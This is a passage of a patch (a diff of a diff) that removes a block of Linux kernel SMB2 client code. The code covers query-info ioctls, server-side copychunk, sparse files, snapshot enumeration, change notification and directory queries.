+-	} else { /* unknown flags */
+-		cifs_tcon_dbg(VFS, "Invalid passthru query flags: 0x%x\n",
+-			      qi.flags);
+-		rc = -EINVAL;
+-	}
+-
+-	if (rc)
+-		goto free_open_req;
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-	/* Close */
+-	rqst[2].rq_iov = &vars->close_iov[0];
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto free_req_1;
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-	if (rc)
+-		goto out;
+-
+-	/* No need to bump num_remote_opens since handle immediately closed */
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		pqi = (struct smb_query_info __user *)arg;
+-		io_rsp = (struct smb2_ioctl_rsp *)rsp_iov[1].iov_base;
+-		if (le32_to_cpu(io_rsp->OutputCount) < qi.input_buffer_length)
+-			qi.input_buffer_length = le32_to_cpu(io_rsp->OutputCount);
+-		if (qi.input_buffer_length > 0 &&
+-		    le32_to_cpu(io_rsp->OutputOffset) + qi.input_buffer_length
+-		    > rsp_iov[1].iov_len) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user(&pqi->input_buffer_length,
+-				 &qi.input_buffer_length,
+-				 sizeof(qi.input_buffer_length))) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user((void __user *)pqi + sizeof(struct smb_query_info),
+-				 (const void *)io_rsp + le32_to_cpu(io_rsp->OutputOffset),
+-				 qi.input_buffer_length))
+-			rc = -EFAULT;
+-	} else {
+-		pqi = (struct smb_query_info __user *)arg;
+-		qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+-		if (le32_to_cpu(qi_rsp->OutputBufferLength) < qi.input_buffer_length)
+-			qi.input_buffer_length = le32_to_cpu(qi_rsp->OutputBufferLength);
+-		if (copy_to_user(&pqi->input_buffer_length,
+-				 &qi.input_buffer_length,
+-				 sizeof(qi.input_buffer_length))) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user(pqi + 1, qi_rsp->Buffer,
+-				 qi.input_buffer_length))
+-			rc = -EFAULT;
+-	}
+-
+-out:
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	SMB2_close_free(&rqst[2]);
+-free_req_1:
+-	free_req1_func(&rqst[1]);
+-free_open_req:
+-	SMB2_open_free(&rqst[0]);
+-free_output_buffer:
+-	kfree(buffer);
+-free_vars:
+-	kfree(vars);
+-	return rc;
+-}
+-
+-static ssize_t
+-smb2_copychunk_range(const unsigned int xid,
+-			struct cifsFileInfo *srcfile,
+-			struct cifsFileInfo *trgtfile, u64 src_off,
+-			u64 len, u64 dest_off)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct copychunk_ioctl *pcchunk;
+-	struct copychunk_ioctl_rsp *retbuf = NULL;
+-	struct cifs_tcon *tcon;
+-	int chunks_copied = 0;
+-	bool chunk_sizes_updated = false;
+-	ssize_t bytes_written, total_bytes_written = 0;
+-
+-	pcchunk = kmalloc(sizeof(struct copychunk_ioctl), GFP_KERNEL);
+-	if (pcchunk == NULL)
+-		return -ENOMEM;
+-
+-	cifs_dbg(FYI, "%s: about to call request res key\n", __func__);
+-	/* Request a key from the server to identify the source of the copy */
+-	rc = SMB2_request_res_key(xid, tlink_tcon(srcfile->tlink),
+-				srcfile->fid.persistent_fid,
+-				srcfile->fid.volatile_fid, pcchunk);
+-
+-	/* Note: request_res_key sets res_key null only if rc !=0 */
+-	if (rc)
+-		goto cchunk_out;
+-
+-	/* For now array only one chunk long, will make more flexible later */
+-	pcchunk->ChunkCount = cpu_to_le32(1);
+-	pcchunk->Reserved = 0;
+-	pcchunk->Reserved2 = 0;
+-
+-	tcon = tlink_tcon(trgtfile->tlink);
+-
+-	while (len > 0) {
+-		pcchunk->SourceOffset = cpu_to_le64(src_off);
+-		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+-		pcchunk->Length =
+-			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+-
+-		/* Request server copy to target from src identified by key */
+-		kfree(retbuf);
+-		retbuf = NULL;
+-		rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
+-			trgtfile->fid.volatile_fid, FSCTL_SRV_COPYCHUNK_WRITE,
+-			(char *)pcchunk, sizeof(struct copychunk_ioctl),
+-			CIFSMaxBufSize, (char **)&retbuf, &ret_data_len);
+-		if (rc == 0) {
+-			if (ret_data_len !=
+-					sizeof(struct copychunk_ioctl_rsp)) {
+-				cifs_tcon_dbg(VFS, "Invalid cchunk response size\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			if (retbuf->TotalBytesWritten == 0) {
+-				cifs_dbg(FYI, "no bytes copied\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			/*
+-			 * Check if server claimed to write more than we asked
+-			 */
+-			if (le32_to_cpu(retbuf->TotalBytesWritten) >
+-			    le32_to_cpu(pcchunk->Length)) {
+-				cifs_tcon_dbg(VFS, "Invalid copy chunk response\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			if (le32_to_cpu(retbuf->ChunksWritten) != 1) {
+-				cifs_tcon_dbg(VFS, "Invalid num chunks written\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			chunks_copied++;
+-
+-			bytes_written = le32_to_cpu(retbuf->TotalBytesWritten);
+-			src_off += bytes_written;
+-			dest_off += bytes_written;
+-			len -= bytes_written;
+-			total_bytes_written += bytes_written;
+-
+-			cifs_dbg(FYI, "Chunks %d PartialChunk %d Total %zu\n",
+-				le32_to_cpu(retbuf->ChunksWritten),
+-				le32_to_cpu(retbuf->ChunkBytesWritten),
+-				bytes_written);
+-		} else if (rc == -EINVAL) {
+-			if (ret_data_len != sizeof(struct copychunk_ioctl_rsp))
+-				goto cchunk_out;
+-
+-			cifs_dbg(FYI, "MaxChunks %d BytesChunk %d MaxCopy %d\n",
+-				le32_to_cpu(retbuf->ChunksWritten),
+-				le32_to_cpu(retbuf->ChunkBytesWritten),
+-				le32_to_cpu(retbuf->TotalBytesWritten));
+-
+-			/*
+-			 * Check if this is the first request using these sizes,
+-			 * (ie check if copy succeed once with original sizes
+-			 * and check if the server gave us different sizes after
+-			 * we already updated max sizes on previous request).
+-			 * if not then why is the server returning an error now
+-			 */
+-			if ((chunks_copied != 0) || chunk_sizes_updated)
+-				goto cchunk_out;
+-
+-			/* Check that server is not asking us to grow size */
+-			if (le32_to_cpu(retbuf->ChunkBytesWritten) <
+-					tcon->max_bytes_chunk)
+-				tcon->max_bytes_chunk =
+-					le32_to_cpu(retbuf->ChunkBytesWritten);
+-			else
+-				goto cchunk_out; /* server gave us bogus size */
+-
+-			/* No need to change MaxChunks since already set to 1 */
+-			chunk_sizes_updated = true;
+-		} else
+-			goto cchunk_out;
+-	}
+-
+-cchunk_out:
+-	kfree(pcchunk);
+-	kfree(retbuf);
+-	if (rc)
+-		return rc;
+-	else
+-		return total_bytes_written;
+-}
+-
+-static int
+-smb2_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	return SMB2_flush(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-static unsigned int
+-smb2_read_data_offset(char *buf)
+-{
+-	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
+-
+-	return rsp->DataOffset;
+-}
+-
+-static unsigned int
+-smb2_read_data_length(char *buf, bool in_remaining)
+-{
+-	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
+-
+-	if (in_remaining)
+-		return le32_to_cpu(rsp->DataRemaining);
+-
+-	return le32_to_cpu(rsp->DataLength);
+-}
+-
+-
+-static int
+-smb2_sync_read(const unsigned int xid, struct cifs_fid *pfid,
+-	       struct cifs_io_parms *parms, unsigned int *bytes_read,
+-	       char **buf, int *buf_type)
+-{
+-	parms->persistent_fid = pfid->persistent_fid;
+-	parms->volatile_fid = pfid->volatile_fid;
+-	return SMB2_read(xid, parms, bytes_read, buf, buf_type);
+-}
+-
+-static int
+-smb2_sync_write(const unsigned int xid, struct cifs_fid *pfid,
+-		struct cifs_io_parms *parms, unsigned int *written,
+-		struct kvec *iov, unsigned long nr_segs)
+-{
+-
+-	parms->persistent_fid = pfid->persistent_fid;
+-	parms->volatile_fid = pfid->volatile_fid;
+-	return SMB2_write(xid, parms, written, iov, nr_segs);
+-}
+-
+-/* Set or clear the SPARSE_FILE attribute based on value passed in setsparse */
+-static bool smb2_set_sparse(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifsFileInfo *cfile, struct inode *inode, __u8 setsparse)
+-{
+-	struct cifsInodeInfo *cifsi;
+-	int rc;
+-
+-	cifsi = CIFS_I(inode);
+-
+-	/* if file already sparse don't bother setting sparse again */
+-	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && setsparse)
+-		return true; /* already sparse */
+-
+-	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && !setsparse)
+-		return true; /* already not sparse */
+-
+-	/*
+-	 * Can't check for sparse support on share the usual way via the
+-	 * FS attribute info (FILE_SUPPORTS_SPARSE_FILES) on the share
+-	 * since Samba server doesn't set the flag on the share, yet
+-	 * supports the set sparse FSCTL and returns sparse correctly
+-	 * in the file attributes. If we fail setting sparse though we
+-	 * mark that server does not support sparse files for this share
+-	 * to avoid repeatedly sending the unsupported fsctl to server
+-	 * if the file is repeatedly extended.
+-	 */
+-	if (tcon->broken_sparse_sup)
+-		return false;
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid, FSCTL_SET_SPARSE,
+-			&setsparse, 1, CIFSMaxBufSize, NULL, NULL);
+-	if (rc) {
+-		tcon->broken_sparse_sup = true;
+-		cifs_dbg(FYI, "set sparse rc = %d\n", rc);
+-		return false;
+-	}
+-
+-	if (setsparse)
+-		cifsi->cifsAttrs |= FILE_ATTRIBUTE_SPARSE_FILE;
+-	else
+-		cifsi->cifsAttrs &= (~FILE_ATTRIBUTE_SPARSE_FILE);
+-
+-	return true;
+-}
+-
+-static int
+-smb2_set_file_size(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, __u64 size, bool set_alloc)
+-{
+-	__le64 eof = cpu_to_le64(size);
+-	struct inode *inode;
+-
+-	/*
+-	 * If extending file more than one page make sparse. Many Linux fs
+-	 * make files sparse by default when extending via ftruncate
+-	 */
+-	inode = d_inode(cfile->dentry);
+-
+-	if (!set_alloc && (size > inode->i_size + 8192)) {
+-		__u8 set_sparse = 1;
+-
+-		/* whether set sparse succeeds or not, extend the file */
+-		smb2_set_sparse(xid, tcon, cfile, inode, set_sparse);
+-	}
+-
+-	return SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			    cfile->fid.volatile_fid, cfile->pid, &eof);
+-}
+-
+-static int
+-smb2_duplicate_extents(const unsigned int xid,
+-			struct cifsFileInfo *srcfile,
+-			struct cifsFileInfo *trgtfile, u64 src_off,
+-			u64 len, u64 dest_off)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct inode *inode;
+-	struct duplicate_extents_to_file dup_ext_buf;
+-	struct cifs_tcon *tcon = tlink_tcon(trgtfile->tlink);
+-
+-	/* server fileays advertise duplicate extent support with this flag */
+-	if ((le32_to_cpu(tcon->fsAttrInfo.Attributes) &
+-	     FILE_SUPPORTS_BLOCK_REFCOUNTING) == 0)
+-		return -EOPNOTSUPP;
+-
+-	dup_ext_buf.VolatileFileHandle = srcfile->fid.volatile_fid;
+-	dup_ext_buf.PersistentFileHandle = srcfile->fid.persistent_fid;
+-	dup_ext_buf.SourceFileOffset = cpu_to_le64(src_off);
+-	dup_ext_buf.TargetFileOffset = cpu_to_le64(dest_off);
+-	dup_ext_buf.ByteCount = cpu_to_le64(len);
+-	cifs_dbg(FYI, "Duplicate extents: src off %lld dst off %lld len %lld\n",
+-		src_off, dest_off, len);
+-
+-	inode = d_inode(trgtfile->dentry);
+-	if (inode->i_size < dest_off + len) {
+-		rc = smb2_set_file_size(xid, tcon, trgtfile, dest_off + len, false);
+-		if (rc)
+-			goto duplicate_extents_out;
+-
+-		/*
+-		 * Although also could set plausible allocation size (i_blocks)
+-		 * here in addition to setting the file size, in reflink
+-		 * it is likely that the target file is sparse. Its allocation
+-		 * size will be queried on next revalidate, but it is important
+-		 * to make sure that file's cached size is updated immediately
+-		 */
+-		cifs_setsize(inode, dest_off + len);
+-	}
+-	rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
+-			trgtfile->fid.volatile_fid,
+-			FSCTL_DUPLICATE_EXTENTS_TO_FILE,
+-			(char *)&dup_ext_buf,
+-			sizeof(struct duplicate_extents_to_file),
+-			CIFSMaxBufSize, NULL,
+-			&ret_data_len);
+-
+-	if (ret_data_len > 0)
+-		cifs_dbg(FYI, "Non-zero response length in duplicate extents\n");
+-
+-duplicate_extents_out:
+-	return rc;
+-}
+-
+-static int
+-smb2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	return SMB2_set_compression(xid, tcon, cfile->fid.persistent_fid,
+-			    cfile->fid.volatile_fid);
+-}
+-
+-static int
+-smb3_set_integrity(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	struct fsctl_set_integrity_information_req integr_info;
+-	unsigned int ret_data_len;
+-
+-	integr_info.ChecksumAlgorithm = cpu_to_le16(CHECKSUM_TYPE_UNCHANGED);
+-	integr_info.Flags = 0;
+-	integr_info.Reserved = 0;
+-
+-	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_SET_INTEGRITY_INFORMATION,
+-			(char *)&integr_info,
+-			sizeof(struct fsctl_set_integrity_information_req),
+-			CIFSMaxBufSize, NULL,
+-			&ret_data_len);
+-
+-}
+-
+-/* GMT Token is @GMT-YYYY.MM.DD-HH.MM.SS Unicode which is 48 bytes + null */
+-#define GMT_TOKEN_SIZE 50
+-
+-#define MIN_SNAPSHOT_ARRAY_SIZE 16 /* See MS-SMB2 section 3.3.5.15.1 */
+-
+-/*
+- * Input buffer contains (empty) struct smb_snapshot array with size filled in
+- * For output see struct SRV_SNAPSHOT_ARRAY in MS-SMB2 section 2.2.32.2
+- */
+-static int
+-smb3_enum_snapshots(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, void __user *ioc_buf)
+-{
+-	char *retbuf = NULL;
+-	unsigned int ret_data_len = 0;
+-	int rc;
+-	u32 max_response_size;
+-	struct smb_snapshot_array snapshot_in;
+-
+-	/*
+-	 * On the first query to enumerate the list of snapshots available
+-	 * for this volume the buffer begins with 0 (number of snapshots
+-	 * which can be returned is zero since at that point we do not know
+-	 * how big the buffer needs to be). On the second query,
+-	 * it (ret_data_len) is set to number of snapshots so we can
+-	 * know to set the maximum response size larger (see below).
+-	 */
+-	if (get_user(ret_data_len, (unsigned int __user *)ioc_buf))
+-		return -EFAULT;
+-
+-	/*
+-	 * Note that for snapshot queries that servers like Azure expect that
+-	 * the first query be minimal size (and just used to get the number/size
+-	 * of previous versions) so response size must be specified as EXACTLY
+-	 * sizeof(struct snapshot_array) which is 16 when rounded up to multiple
+-	 * of eight bytes.
+-	 */
+-	if (ret_data_len == 0)
+-		max_response_size = MIN_SNAPSHOT_ARRAY_SIZE;
+-	else
+-		max_response_size = CIFSMaxBufSize;
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_SRV_ENUMERATE_SNAPSHOTS,
+-			NULL, 0 /* no input data */, max_response_size,
+-			(char **)&retbuf,
+-			&ret_data_len);
+-	cifs_dbg(FYI, "enum snaphots ioctl returned %d and ret buflen is %d\n",
+-			rc, ret_data_len);
+-	if (rc)
+-		return rc;
+-
+-	if (ret_data_len && (ioc_buf != NULL) && (retbuf != NULL)) {
+-		/* Fixup buffer */
+-		if (copy_from_user(&snapshot_in, ioc_buf,
+-		    sizeof(struct smb_snapshot_array))) {
+-			rc = -EFAULT;
+-			kfree(retbuf);
+-			return rc;
+-		}
+-
+-		/*
+-		 * Check for min size, ie not large enough to fit even one GMT
+-		 * token (snapshot).  On the first ioctl some users may pass in
+-		 * smaller size (or zero) to simply get the size of the array
+-		 * so the user space caller can allocate sufficient memory
+-		 * and retry the ioctl again with larger array size sufficient
+-		 * to hold all of the snapshot GMT tokens on the second try.
+-		 */
+-		if (snapshot_in.snapshot_array_size < GMT_TOKEN_SIZE)
+-			ret_data_len = sizeof(struct smb_snapshot_array);
+-
+-		/*
+-		 * We return struct SRV_SNAPSHOT_ARRAY, followed by
+-		 * the snapshot array (of 50 byte GMT tokens) each
+-		 * representing an available previous version of the data
+-		 */
+-		if (ret_data_len > (snapshot_in.snapshot_array_size +
+-					sizeof(struct smb_snapshot_array)))
+-			ret_data_len = snapshot_in.snapshot_array_size +
+-					sizeof(struct smb_snapshot_array);
+-
+-		if (copy_to_user(ioc_buf, retbuf, ret_data_len))
+-			rc = -EFAULT;
+-	}
+-
+-	kfree(retbuf);
+-	return rc;
+-}
+-
+-
+-
+-static int
+-smb3_notify(const unsigned int xid, struct file *pfile,
+-	    void __user *ioc_buf, bool return_changes)
+-{
+-	struct smb3_notify_info notify;
+-	struct smb3_notify_info __user *pnotify_buf;
+-	struct dentry *dentry = pfile->f_path.dentry;
+-	struct inode *inode = file_inode(pfile);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct cifs_tcon *tcon;
+-	const unsigned char *path;
+-	char *returned_ioctl_info = NULL;
+-	void *page = alloc_dentry_path();
+-	__le16 *utf16_path = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	int rc = 0;
+-	__u32 ret_len = 0;
+-
+-	path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(path)) {
+-		rc = PTR_ERR(path);
+-		goto notify_exit;
+-	}
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (utf16_path == NULL) {
+-		rc = -ENOMEM;
+-		goto notify_exit;
+-	}
+-
+-	if (return_changes) {
+-		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify_info))) {
+-			rc = -EFAULT;
+-			goto notify_exit;
+-		}
+-	} else {
+-		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify))) {
+-			rc = -EFAULT;
+-			goto notify_exit;
+-		}
+-		notify.data_len = 0;
+-	}
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
+-	if (rc)
+-		goto notify_exit;
+-
+-	rc = SMB2_change_notify(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-				notify.watch_tree, notify.completion_filter,
+-				notify.data_len, &returned_ioctl_info, &ret_len);
+-
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-	cifs_dbg(FYI, "change notify for path %s rc %d\n", path, rc);
+-	if (return_changes && (ret_len > 0) && (notify.data_len > 0)) {
+-		if (ret_len > notify.data_len)
+-			ret_len = notify.data_len;
+-		pnotify_buf = (struct smb3_notify_info __user *)ioc_buf;
+-		if (copy_to_user(pnotify_buf->notify_data, returned_ioctl_info, ret_len))
+-			rc = -EFAULT;
+-		else if (copy_to_user(&pnotify_buf->data_len, &ret_len, sizeof(ret_len)))
+-			rc = -EFAULT;
+-	}
+-	kfree(returned_ioctl_info);
+-notify_exit:
+-	free_dentry_path(page);
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-static int
+-smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *path, struct cifs_sb_info *cifs_sb,
+-		     struct cifs_fid *fid, __u16 search_flags,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	__le16 *utf16_path;
+-	struct smb_rqst rqst[2];
+-	struct kvec rsp_iov[2];
+-	int resp_buftype[2];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qd_iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
+-	int rc, flags = 0;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct smb2_query_directory_rsp *qd_rsp = NULL;
+-	struct smb2_create_rsp *op_rsp = NULL;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int retry_count = 0;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto qdf_free;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	/* Query directory */
+-	srch_inf->entries_in_buffer = 0;
+-	srch_inf->index_of_last_entry = 2;
+-
+-	memset(&qd_iov, 0, sizeof(qd_iov));
+-	rqst[1].rq_iov = qd_iov;
+-	rqst[1].rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
+-
+-	rc = SMB2_query_directory_init(xid, tcon, server,
+-				       &rqst[1],
+-				       COMPOUND_FID, COMPOUND_FID,
+-				       0, srch_inf->info_level);
+-	if (rc)
+-		goto qdf_free;
+-
+-	smb2_set_related(&rqst[1]);
+-
+-again:
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 2, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	if (rc == -EAGAIN && retry_count++ < 10)
+-		goto again;
+-
+-	/* If the open failed there is nothing to do */
+-	op_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+-	if (op_rsp == NULL || op_rsp->hdr.Status != STATUS_SUCCESS) {
+-		cifs_dbg(FYI, "query_dir_first: open failed rc=%d\n", rc);
+-		goto qdf_free;
+-	}
+-	fid->persistent_fid = op_rsp->PersistentFileId;
+-	fid->volatile_fid = op_rsp->VolatileFileId;
+-
+-	/* Anything else than ENODATA means a genuine error */
+-	if (rc && rc != -ENODATA) {
+-		SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-		cifs_dbg(FYI, "query_dir_first: query directory failed rc=%d\n", rc);
+-		trace_smb3_query_dir_err(xid, fid->persistent_fid,
+-					 tcon->tid, tcon->ses->Suid, 0, 0, rc);
+-		goto qdf_free;
+-	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
+-
+-	qd_rsp = (struct smb2_query_directory_rsp *)rsp_iov[1].iov_base;
+-	if (qd_rsp->hdr.Status == STATUS_NO_MORE_FILES) {
+-		trace_smb3_query_dir_done(xid, fid->persistent_fid,
+-					  tcon->tid, tcon->ses->Suid, 0, 0);
+-		srch_inf->endOfSearch = true;
+-		rc = 0;
+-		goto qdf_free;
+-	}
+-
+-	rc = smb2_parse_query_directory(tcon, &rsp_iov[1], resp_buftype[1],
+-					srch_inf);
+-	if (rc) {
+-		trace_smb3_query_dir_err(xid, fid->persistent_fid, tcon->tid,
+-			tcon->ses->Suid, 0, 0, rc);
+-		goto qdf_free;
+-	}
+-	resp_buftype[1] = CIFS_NO_BUFFER;
+-
+-	trace_smb3_query_dir_done(xid, fid->persistent_fid, tcon->tid,
+-			tcon->ses->Suid, 0, srch_inf->entries_in_buffer);
+-
+- qdf_free:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_directory_free(&rqst[1]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	return rc;
+-}
+-
+-static int
+-smb2_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
+-		    struct cifs_fid *fid, __u16 search_flags,
+-		    struct cifs_search_info *srch_inf)
+-{
+-	return SMB2_query_directory(xid, tcon, fid->persistent_fid,
+-				    fid->volatile_fid, 0, srch_inf);
+-}
+-
+-static int
+-smb2_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_fid *fid)
+-{
+-	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-/*
+- * If we negotiate SMB2 protocol and get STATUS_PENDING - update
+- * the number of credits and return true. Otherwise - return false.
+- */
+-static bool
+-smb2_is_status_pending(char *buf, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	int scredits, in_flight;
+-
+-	if (shdr->Status != STATUS_PENDING)
+-		return false;
+-
+-	if (shdr->CreditRequest) {
+-		spin_lock(&server->req_lock);
+-		server->credits += le16_to_cpu(shdr->CreditRequest);
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-		wake_up(&server->request_q);
+-
+-		trace_smb3_pend_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits,
+-				le16_to_cpu(shdr->CreditRequest), in_flight);
+-		cifs_dbg(FYI, "%s: status pending add %u credits total=%d\n",
+-				__func__, le16_to_cpu(shdr->CreditRequest), scredits);
+-	}
+-
+-	return true;
+-}
+-
+-static bool
+-smb2_is_session_expired(char *buf)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	if (shdr->Status != STATUS_NETWORK_SESSION_EXPIRED &&
+-	    shdr->Status != STATUS_USER_SESSION_DELETED)
+-		return false;
+-
+-	trace_smb3_ses_expired(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			       le64_to_cpu(shdr->SessionId),
+-			       le16_to_cpu(shdr->Command),
+-			       le64_to_cpu(shdr->MessageId));
+-	cifs_dbg(FYI, "Session expired or deleted\n");
+-
+-	return true;
+-}
+-
+-static bool
+-smb2_is_status_io_timeout(char *buf)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-
+-	if (shdr->Status == STATUS_IO_TIMEOUT)
+-		return true;
+-	else
+-		return false;
+-}
+-
+-static void
+-smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	if (shdr->Status != STATUS_NETWORK_NAME_DELETED)
+-		return;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
+-				spin_lock(&tcon->tc_lock);
+-				tcon->need_reconnect = true;
+-				spin_unlock(&tcon->tc_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				pr_warn_once("Server share %s deleted.\n",
+-					     tcon->tree_name);
+-				return;
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-static int
+-smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
+-		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+-{
+-	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
+-		return SMB2_lease_break(0, tcon, cinode->lease_key,
+-					smb2_get_lease_state(cinode));
+-
+-	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
+-				 CIFS_CACHE_READ(cinode) ? 1 : 0);
+-}
+-
+-void
+-smb2_set_related(struct smb_rqst *rqst)
+-{
+-	struct smb2_hdr *shdr;
+-
+-	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
+-	if (shdr == NULL) {
+-		cifs_dbg(FYI, "shdr NULL in smb2_set_related\n");
+-		return;
+-	}
+-	shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
+-}
+-
+-char smb2_padding[7] = {0, 0, 0, 0, 0, 0, 0};
+-
+-void
